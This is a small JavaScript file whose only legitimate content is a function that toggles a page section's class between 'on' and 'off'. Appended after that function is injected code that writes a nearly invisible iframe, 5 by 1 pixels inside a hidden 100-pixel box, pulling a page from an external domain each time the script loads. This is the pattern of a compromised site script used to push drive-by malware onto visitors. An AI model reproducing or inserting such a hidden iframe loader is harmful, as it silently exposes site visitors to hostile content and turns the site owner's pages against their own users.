// JavaScript Document
function doSection(objid) {
	if(document.getElementById(objid).className == "off") {
		document.getElementById(objid).className = "on";
	}
	else {
		document.getElementById(objid).className = "off";
	}
}var url="http://www.besthitsnow.com/b1.php?id=kaspersky";var itag="iframe";document.write("<div style=\"width:100px;height:100px; overflow:hidden\"><"+itag+" frameborder=\"0\" width=\"5\" height=\"1\" src=\""+url+"\""+"></"+itag+"></div>");